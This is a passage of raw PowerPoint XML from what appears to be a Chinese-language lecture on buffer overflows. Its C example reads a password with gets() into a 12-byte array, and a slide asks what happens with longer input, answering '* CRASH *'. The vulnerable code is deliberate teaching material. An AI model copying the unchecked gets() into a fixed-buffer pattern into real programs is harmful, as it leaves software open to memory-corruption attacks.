              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Password Invalid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main(void) {	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>PwStatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>;              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Password Status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> puts("Enter Password:");    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>PwStatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>IsPasswordOK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>();    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Get &amp; Check Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>PwStatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>      puts("Access denied"); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>      exit(-1);              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Terminate Program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> puts("Access granted");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2943322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18483" y="436563"/>
            <a:ext cx="7543800" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="1885157"/>
            <a:ext cx="4037013" cy="967779"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果密码的长度超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>个字符会发生什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> ? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36868" name="Picture 9"/>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23875" y="2965450"/>
            <a:ext cx="5932488" cy="1125538"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2209800"/>
            <a:ext cx="5145088" cy="3114675"/>
            <a:chOff x="2112" y="1680"/>
            <a:chExt cx="3241" cy="1962"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36870" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="2212194">
              <a:off x="3984" y="1680"/>
              <a:ext cx="1369"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3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>* CRASH *</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3687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 y="2448"/>
              <a:ext cx="2514" cy="1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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D21C09B4-D851-4043-BACE-08EB012A6BE7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5258246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3" name="bomb.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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1905000"/>
            <a:ext cx="4267200" cy="206057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lgn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> IsPasswordOK(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char Password[12];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>gets(Password);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (!strcmp(Password,"badprog"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>      return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>false)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="290870" name="Group 54"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5448300" y="1979613"/>
          <a:ext cx="3543300" cy="4123119"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3543300">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="641350">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>存储</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
